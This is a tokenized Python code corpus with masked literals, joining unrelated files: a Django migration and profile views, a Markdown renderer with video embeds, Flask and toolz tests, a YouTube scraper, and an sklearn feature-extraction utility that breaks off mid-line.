'<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , 
<EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { 
'<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:status>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:2>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:file>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:content>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : 
"<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> from django . db import models , transaction <EOL> from mezzanine . core . managers import SearchableManager <EOL> from raspberryio . search . utils import load_search_model_indexes <EOL> class Searchable ( models . Model ) : <EOL> """<STR_LIT>""" <EOL> objects = SearchableManager ( ) <EOL> class Meta ( ) : <EOL> abstract = True <EOL> searchable_models = load_search_model_indexes ( ) </s>
<s> from django . contrib . auth . decorators import login_required <EOL> from django . core . paginator import Paginator , EmptyPage , PageNotAnInteger <EOL> from django . shortcuts import render , get_object_or_404 , redirect <EOL> from actstream import models <EOL> from raspberryio . userprofile . models import Profile <EOL> from django . contrib . auth import login as auth_login <EOL> from django . contrib . messages import info <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django . views . decorators . cache import cache_page <EOL> from django . views . decorators . csrf import csrf_protect <EOL> from mezzanine . utils . models import get_user_model <EOL> from mezzanine . accounts . forms import LoginForm <EOL> from mezzanine . utils . urls import login_redirect <EOL> User = get_user_model ( ) <EOL> @ cache_page ( <NUM_LIT> * <NUM_LIT:30> ) <EOL> @ csrf_protect <EOL> def login ( request , template = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> form = LoginForm ( request . POST or None ) <EOL> if request . method == "<STR_LIT:POST>" and form . is_valid ( ) : <EOL> authenticated_user = form . save ( ) <EOL> info ( request , _ ( "<STR_LIT>" ) ) <EOL> auth_login ( request , authenticated_user ) <EOL> return login_redirect ( request ) <EOL> context = { "<STR_LIT>" : form , "<STR_LIT:title>" : _ ( "<STR_LIT>" ) } <EOL> return render ( request , template , context ) <EOL> def profile_related_list ( request , username , relation ) : <EOL> "<STR_LIT>" <EOL> profile = get_object_or_404 ( Profile , user__username__iexact = username ) <EOL> user = profile . user <EOL> if relation == '<STR_LIT>' : <EOL> related_users = models . followers ( user ) <EOL> elif relation == '<STR_LIT>' : <EOL> related_users = models . following ( user ) <EOL> paginator = Paginator ( related_users , <NUM_LIT:20> ) <EOL> page = request . GET . get ( '<STR_LIT>' ) <EOL> try : <EOL> related_users = paginator . 
page ( page ) <EOL> except PageNotAnInteger : <EOL> related_users = paginator . page ( <NUM_LIT:1> ) <EOL> except EmptyPage : <EOL> related_users = paginator . page ( paginator . num_pages ) <EOL> return render ( request , "<STR_LIT>" , { <EOL> '<STR_LIT:user>' : user , <EOL> '<STR_LIT>' : profile , <EOL> '<STR_LIT>' : related_users , <EOL> } ) <EOL> def profile_actions ( request , username ) : <EOL> "<STR_LIT>" <EOL> profile = get_object_or_404 ( Profile , user__username__iexact = username ) <EOL> user = profile . user <EOL> return render ( request , "<STR_LIT>" , { <EOL> '<STR_LIT:user>' : user , <EOL> '<STR_LIT>' : profile , <EOL> '<STR_LIT>' : models . actor_stream ( user ) , <EOL> } ) <EOL> @ login_required <EOL> def profile_dashboard ( request ) : <EOL> """<STR_LIT>""" <EOL> user = get_object_or_404 ( User , id = request . user . id ) <EOL> return render ( request , "<STR_LIT>" , { <EOL> '<STR_LIT:user>' : user , <EOL> '<STR_LIT>' : user . get_profile ( ) , <EOL> '<STR_LIT>' : models . user_stream ( user ) , <EOL> } ) <EOL> def profile_users ( request ) : <EOL> """<STR_LIT>""" <EOL> users = User . objects . filter ( is_active = True , profile__isnull = False ) . order_by ( '<STR_LIT:username>' ) <EOL> paginator = Paginator ( users , <NUM_LIT:20> ) <EOL> page = request . GET . get ( '<STR_LIT>' ) <EOL> try : <EOL> users = paginator . page ( page ) <EOL> except PageNotAnInteger : <EOL> users = paginator . page ( <NUM_LIT:1> ) <EOL> except EmptyPage : <EOL> users = paginator . page ( paginator . num_pages ) <EOL> return render ( request , "<STR_LIT>" , { <EOL> '<STR_LIT>' : users <EOL> } ) </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> import datetime <EOL> import misaka as m <EOL> from markupsafe import escape <EOL> from pygments import highlight <EOL> from pygments . lexers import get_lexer_by_name <EOL> from pygments . formatters import HtmlFormatter <EOL> from flask_babel import gettext as _ <EOL> def _iframe ( src , width = <NUM_LIT> , height = <NUM_LIT> , content = None , link = None ) : <EOL> """<STR_LIT>""" <EOL> html = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) % ( width , height , src ) <EOL> if not content : <EOL> return html <EOL> if link : <EOL> content = '<STR_LIT>' % ( link , content ) <EOL> return '<STR_LIT>' % ( <EOL> html , content <EOL> ) <EOL> def youtube ( link ) : <EOL> """<STR_LIT>""" <EOL> pattern = r'<STR_LIT>' <EOL> match = re . match ( pattern , link ) <EOL> if not match : <EOL> pattern = r'<STR_LIT>' <EOL> match = re . match ( pattern , link ) <EOL> if not match : <EOL> return None <EOL> return '<STR_LIT>' % match . group ( <NUM_LIT:1> ) <EOL> def vimeo ( link ) : <EOL> """<STR_LIT>""" <EOL> pattern = r'<STR_LIT>' <EOL> match = re . match ( pattern , link ) <EOL> if not match : <EOL> return None <EOL> return '<STR_LIT>' % match . group ( <NUM_LIT:1> ) <EOL> def youku ( link ) : <EOL> """<STR_LIT>""" <EOL> pattern = r'<STR_LIT>' <EOL> match = re . match ( pattern , link ) <EOL> if not match : <EOL> return None <EOL> return '<STR_LIT>' % match . group ( <NUM_LIT:1> ) <EOL> def gist ( link , content = None ) : <EOL> """<STR_LIT>""" <EOL> pattern = r'<STR_LIT>' <EOL> match = re . match ( pattern , link ) <EOL> if not match : <EOL> return None <EOL> html = '<STR_LIT>' % { '<STR_LIT>' : match . 
group ( <NUM_LIT:1> ) } <EOL> if not content : <EOL> return html <EOL> return '<STR_LIT>' % ( <EOL> html , content <EOL> ) <EOL> def embed ( link , width = <NUM_LIT> , height = <NUM_LIT> , content = None ) : <EOL> src = youtube ( link ) <EOL> if src : <EOL> return _iframe ( src , width , height , content , link ) <EOL> src = vimeo ( link ) <EOL> if src : <EOL> return _iframe ( src , width , height , content , link ) <EOL> src = youku ( link ) <EOL> if src : <EOL> return _iframe ( src , width , height , content , link ) <EOL> return None <EOL> class BaseRenderer ( m . HtmlRenderer ) : <EOL> def autolink ( self , link , is_email ) : <EOL> if is_email : <EOL> return '<STR_LIT>' % { '<STR_LIT>' : link } <EOL> html = embed ( link ) <EOL> if html : <EOL> return html <EOL> content = link . replace ( '<STR_LIT>' , '<STR_LIT>' ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return '<STR_LIT>' % ( link , content ) <EOL> def link ( self , link , title , content ) : <EOL> width = <NUM_LIT> <EOL> height = <NUM_LIT> <EOL> if title : <EOL> pattern = r'<STR_LIT>' <EOL> match = re . match ( pattern , title ) <EOL> if match : <EOL> width = match . group ( <NUM_LIT:1> ) <EOL> height = match . group ( <NUM_LIT:2> ) <EOL> html = embed ( link , width , height , content ) <EOL> if html : <EOL> return html <EOL> html = '<STR_LIT>' % link <EOL> if title : <EOL> html = '<STR_LIT>' % ( html , title ) <EOL> html = '<STR_LIT>' % ( html , content ) <EOL> return html <EOL> def image ( self , link , title , alt_text ) : <EOL> html = '<STR_LIT>' % ( link , alt_text ) <EOL> if not title : <EOL> return html <EOL> return '<STR_LIT>' % ( <EOL> html , title <EOL> ) <EOL> def paragraph ( self , content ) : <EOL> pattern = r'<STR_LIT>' <EOL> if re . match ( pattern , content ) : <EOL> return content <EOL> pattern = r'<STR_LIT>' <EOL> if re . match ( pattern , content ) : <EOL> return '<STR_LIT>' % content <EOL> pattern = re . compile ( r'<STR_LIT>' ) <EOL> content = pattern . 
sub ( r'<STR_LIT>' , content ) <EOL> pattern = re . compile ( r'<STR_LIT>' ) <EOL> content = pattern . sub ( r'<STR_LIT>' , content ) <EOL> return '<STR_LIT>' % content <EOL> def block_quote ( self , content ) : <EOL> pattern = r'<STR_LIT>' <EOL> match = re . search ( pattern , content , re . M | re . U ) <EOL> if not match : <EOL> return '<STR_LIT>' % content <EOL> text = match . group ( <NUM_LIT:1> ) . strip ( ) <EOL> pattern = r'<STR_LIT>' % match . group ( <NUM_LIT:0> ) <EOL> content = re . sub ( pattern , match . group ( <NUM_LIT:2> ) , content ) <EOL> return ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) % ( content , text ) <EOL> class HighlightRenderer ( BaseRenderer ) : <EOL> def autolink ( self , link , is_email ) : <EOL> html = gist ( link ) <EOL> if html : <EOL> return html <EOL> return super ( HighlightRenderer , self ) . autolink ( link , is_email ) <EOL> def link ( self , link , title , content ) : <EOL> html = gist ( link , content ) <EOL> if html : <EOL> return html <EOL> return super ( HighlightRenderer , self ) . link ( link , title , content ) <EOL> def block_code ( self , text , lang ) : <EOL> if not lang : <EOL> return u'<STR_LIT>' % escape ( text ) <EOL> inlinestyles = False <EOL> linenos = False <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> inlinestyles = self . _inlinestyles <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> linenos = self . 
_linenos <EOL> try : <EOL> lexer = get_lexer_by_name ( lang , stripall = True ) <EOL> formatter = HtmlFormatter ( <EOL> noclasses = inlinestyles , linenos = linenos <EOL> ) <EOL> code = highlight ( text , lexer , formatter ) <EOL> if linenos : <EOL> return '<STR_LIT>' % code <EOL> return code <EOL> except : <EOL> return '<STR_LIT>' % ( <EOL> lang , escape ( text ) <EOL> ) <EOL> class PlainRenderer ( BaseRenderer ) : <EOL> def header ( self , text , level ) : <EOL> return '<STR_LIT>' % ( level , text ) <EOL> def markdown ( text , renderer = '<STR_LIT>' , inlinestyles = False , linenos = False ) : <EOL> """<STR_LIT>""" <EOL> if not text : <EOL> return u'<STR_LIT>' <EOL> flags = m . HTML_ESCAPE <EOL> if renderer == '<STR_LIT>' : <EOL> r = HighlightRenderer ( flags = flags ) <EOL> r . _inlinestyles = inlinestyles <EOL> r . _linenos = linenos <EOL> elif renderer == '<STR_LIT>' : <EOL> r = PlainRenderer ( flags = flags ) <EOL> else : <EOL> r = BaseRenderer ( flags = flags ) <EOL> extensions = ( <EOL> m . EXT_NO_INTRA_EMPHASIS | m . EXT_FENCED_CODE | m . EXT_AUTOLINK | <EOL> m . EXT_TABLES | m . EXT_STRIKETHROUGH | m . EXT_SUPERSCRIPT <EOL> ) <EOL> md = m . Markdown ( r , extensions = extensions ) <EOL> return md . render ( text ) <EOL> def timesince ( value ) : <EOL> now = datetime . datetime . utcnow ( ) <EOL> delta = now - value <EOL> if delta . days > <NUM_LIT> : <EOL> return _ ( '<STR_LIT>' , num = delta . days / <NUM_LIT> ) <EOL> if delta . days > <NUM_LIT:30> : <EOL> return _ ( '<STR_LIT>' , num = delta . days / <NUM_LIT:30> ) <EOL> if delta . days > <NUM_LIT:0> : <EOL> return _ ( '<STR_LIT>' , num = delta . days ) <EOL> if delta . seconds > <NUM_LIT> : <EOL> return _ ( '<STR_LIT>' , num = delta . seconds / <NUM_LIT> ) <EOL> if delta . seconds > <NUM_LIT> : <EOL> return _ ( '<STR_LIT>' , num = delta . seconds / <NUM_LIT> ) <EOL> return _ ( '<STR_LIT>' ) <EOL> def xmldatetime ( value ) : <EOL> if not isinstance ( value , datetime . 
datetime ) : <EOL> return value <EOL> return value . strftime ( '<STR_LIT>' ) </s>
<s> from . suite import BaseSuite <EOL> class TestUser ( BaseSuite ) : <EOL> def test_users ( self ) : <EOL> url = self . url_for ( '<STR_LIT>' ) <EOL> rv = self . client . get ( url ) <EOL> assert '<STR_LIT>' in rv . data <EOL> rv = self . client . get ( url + '<STR_LIT>' ) <EOL> assert rv . status_code == <NUM_LIT> <EOL> def test_city ( self ) : <EOL> url = self . url_for ( '<STR_LIT>' , city = '<STR_LIT>' ) <EOL> rv = self . client . get ( url ) <EOL> assert '<STR_LIT>' in rv . data <EOL> rv = self . client . get ( url + '<STR_LIT>' ) <EOL> assert rv . status_code == <NUM_LIT> <EOL> def test_view ( self ) : <EOL> self . prepare_account ( ) <EOL> rv = self . client . get ( self . url_for ( '<STR_LIT>' , username = '<STR_LIT:foo>' ) ) <EOL> assert '<STR_LIT>' in rv . data <EOL> rv = self . client . get ( self . url_for ( '<STR_LIT>' , username = '<STR_LIT:foo>' ) ) <EOL> assert rv . status_code == <NUM_LIT:200> <EOL> rv = self . client . get ( self . url_for ( '<STR_LIT>' , username = '<STR_LIT:foo>' <EOL> ) + '<STR_LIT>' ) <EOL> assert rv . status_code == <NUM_LIT> </s>
<s> from toolz . curried import * <EOL> import os <EOL> if not os . path . exists ( '<STR_LIT>' ) : <EOL> os . system ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def stem ( word ) : <EOL> """<STR_LIT>""" <EOL> return word . lower ( ) . rstrip ( "<STR_LIT>" ) . lstrip ( "<STR_LIT>" ) <EOL> wordcount = comp ( frequencies , map ( stem ) , concat , map ( str . split ) ) <EOL> def test_shakespeare ( ) : <EOL> with open ( '<STR_LIT>' ) as f : <EOL> counts = wordcount ( f ) </s>
<s> from toolz import * <EOL> import pickle <EOL> def test_compose ( ) : <EOL> f = compose ( str , sum ) <EOL> g = pickle . loads ( pickle . dumps ( f ) ) <EOL> assert f ( ( <NUM_LIT:1> , <NUM_LIT:2> ) ) == g ( ( <NUM_LIT:1> , <NUM_LIT:2> ) ) <EOL> def test_curry ( ) : <EOL> f = curry ( map ) ( str ) <EOL> g = pickle . loads ( pickle . dumps ( f ) ) <EOL> assert list ( f ( ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) ) ) == list ( g ( ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) ) ) <EOL> def test_juxt ( ) : <EOL> f = juxt ( str , int , bool ) <EOL> g = pickle . loads ( pickle . dumps ( f ) ) <EOL> assert f ( <NUM_LIT:1> ) == g ( <NUM_LIT:1> ) <EOL> assert f . funcs == g . funcs <EOL> def test_complement ( ) : <EOL> f = complement ( bool ) <EOL> assert f ( True ) is False <EOL> assert f ( False ) is True <EOL> g = pickle . loads ( pickle . dumps ( f ) ) <EOL> assert f ( True ) == g ( True ) <EOL> assert f ( False ) == g ( False ) </s>
<s> import json <EOL> import subprocess <EOL> from datetime import datetime <EOL> from steve . util import is_youtube <EOL> class ScraperError ( Exception ) : <EOL> pass <EOL> class Scraper ( object ) : <EOL> def scrape ( self , url ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplemented <EOL> class YoutubeScraper ( object ) : <EOL> def transform_item ( self , item ) : <EOL> """<STR_LIT>""" <EOL> return { <EOL> '<STR_LIT:title>' : item [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : item [ '<STR_LIT:description>' ] , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT:state>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : item [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : item [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : item [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : datetime . strptime ( item [ '<STR_LIT>' ] , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : item [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ ] <EOL> } <EOL> def scrape ( self , url ) : <EOL> """<STR_LIT>""" <EOL> if not is_youtube ( url ) : <EOL> return <EOL> try : <EOL> output = subprocess . check_output ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , url ] , <EOL> stderr = subprocess . STDOUT <EOL> ) <EOL> except subprocess . CalledProcessError as cpe : <EOL> raise ScraperError ( '<STR_LIT>' . format ( cpe . output ) ) <EOL> except OSError : <EOL> raise ScraperError ( '<STR_LIT>' ) <EOL> items = [ ] <EOL> for line in output . splitlines ( ) : <EOL> items . append ( json . loads ( line ) ) <EOL> items = [ self . transform_item ( item ) for item in items ] <EOL> return items </s>
<s> from __future__ import division <EOL> import numpy as np <EOL> import multiprocessing as multi <EOL> import logging <EOL> import types <EOL> import sklearn <EOL> from sklearn . preprocessing import LabelBinarizer , MultiLabelBinarizer <EOL> from import_utils import import_class <EOL> from preprocessing_utils import map_feature_extractor <EOL> logging . basicConfig ( format = '<STR_LIT>' , level = logging . INFO ) <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> def init_class ( klass , args ) : <EOL> return klass ( * args ) <EOL> def filter_contexts ( token_contexts , min_total = <NUM_LIT:1> ) : <EOL> return { token : contexts for token , contexts in token_contexts . items ( ) if len ( contexts ) >= min_total } <EOL> def filter_contexts_class ( token_contexts , min_total = <NUM_LIT:1> , min_class_count = <NUM_LIT:1> , proportion = <NUM_LIT:2> ) : <EOL> new_token_contexts = { } <EOL> classes = set ( [ cc [ '<STR_LIT>' ] for context in token_contexts . values ( ) for cc in context ] ) <EOL> for token , contexts in token_contexts . items ( ) : <EOL> if len ( contexts ) < min_total : <EOL> continue <EOL> class_counts = { cl : <NUM_LIT:0> for cl in classes } <EOL> for cc in contexts : <EOL> class_counts [ cc [ '<STR_LIT>' ] ] += <NUM_LIT:1> <EOL> min_class = min ( class_counts . values ( ) ) <EOL> cur_proportion = max ( class_counts . values ( ) ) / max ( min_class , <NUM_LIT:1> ) <EOL> if min_class >= min_class_count and cur_proportion <= proportion : <EOL> new_token_contexts [ token ] = contexts <EOL> return new_token_contexts <EOL> import copy <EOL> def convert_tagset ( tagmap , tok_contexts ) : <EOL> tok_contexts_copy = copy . deepcopy ( tok_contexts ) <EOL> for tok , contexts in tok_contexts_copy . 
iteritems ( ) : <EOL> for context in contexts : <EOL> context [ '<STR_LIT>' ] = tagmap [ context [ '<STR_LIT>' ] ] <EOL> return tok_contexts_copy <EOL> def flatten ( lofl ) : <EOL> return [ item for sublist in lofl for item in sublist ] <EOL> def map_contexts ( tokens , context_creators ) : <EOL> return { token : flatten ( [ creator . get_contexts ( token ) for creator in context_creators ] ) for token in tokens } <EOL> def map_context_creators ( ( token , context_creators ) ) : <EOL> logger . info ( '<STR_LIT>' + token ) <EOL> contexts = flatten ( [ creator . get_contexts ( token ) for creator in context_creators ] ) <EOL> return token , contexts <EOL> def map_contexts ( tokens , context_creators , workers = <NUM_LIT:1> ) : <EOL> if workers == <NUM_LIT:1> : <EOL> return { token : flatten ( [ creator . get_contexts ( token ) for creator in context_creators ] ) for token in tokens } <EOL> else : <EOL> pool = multi . Pool ( workers ) <EOL> tokens_with_extractors = [ ( token , context_creators ) for token in tokens ] <EOL> res = pool . map ( map_context_creators , tokens_with_extractors ) <EOL> res_dict = { k : v for k , v in res } <EOL> return res_dict <EOL> def token_contexts_to_features ( token_contexts , feature_extractors , workers = <NUM_LIT:1> ) : <EOL> if workers == <NUM_LIT:1> : <EOL> return { token : np . vstack ( [ np . hstack ( [ map_feature_extractor ( ( context , extractor ) ) for extractor in feature_extractors ] ) for context in contexts ] ) for token , contexts in token_contexts . items ( ) } <EOL> else : <EOL> res_dict = { } <EOL> pool = multi . Pool ( workers ) <EOL> print ( "<STR_LIT>" , feature_extractors ) <EOL> for token , contexts in token_contexts . items ( ) : <EOL> logger . info ( '<STR_LIT>' + token + '<STR_LIT>' + str ( len ( contexts ) ) + '<STR_LIT>' ) <EOL> extractors_output = [ ] <EOL> for extractor in feature_extractors : <EOL> context_list = [ ( cont , extractor ) for cont in contexts ] <EOL> extractors_output . append ( np . 
